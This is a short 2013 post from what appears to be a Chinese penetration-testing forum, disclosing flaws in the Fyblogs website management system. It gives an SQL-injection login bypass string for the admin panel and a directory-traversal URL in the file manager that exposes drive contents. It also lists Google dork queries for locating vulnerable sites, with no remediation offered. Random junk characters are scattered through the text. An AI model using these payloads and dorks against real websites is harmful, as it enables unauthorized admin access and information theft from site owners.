中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-14 20:17
标题: Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
& F6 i- V" n7 @) |9 i8 ^* d& B) u
- y3 f8 z" h* k' Z0 P6 A$ V$ i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 n# l  o# w6 w  gadmin/uploadfile.asp?currentFolder=/upfiles/../
. Q+ s" h7 H2 D) d  P, i) Z2 {' x+ z# w, o
漏洞证明:/ f1 e5 m" M" e2 w
3 o; t1 I* B, S' K: n' L
谷歌:inurl:type.asp?id=1 新闻中心  y* ?! t! g4 t. ^
或者 :inurl:download_ok.asp?
. H9 P. e' i, b6 c4 K; I# Q  @4 _! U4 S





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2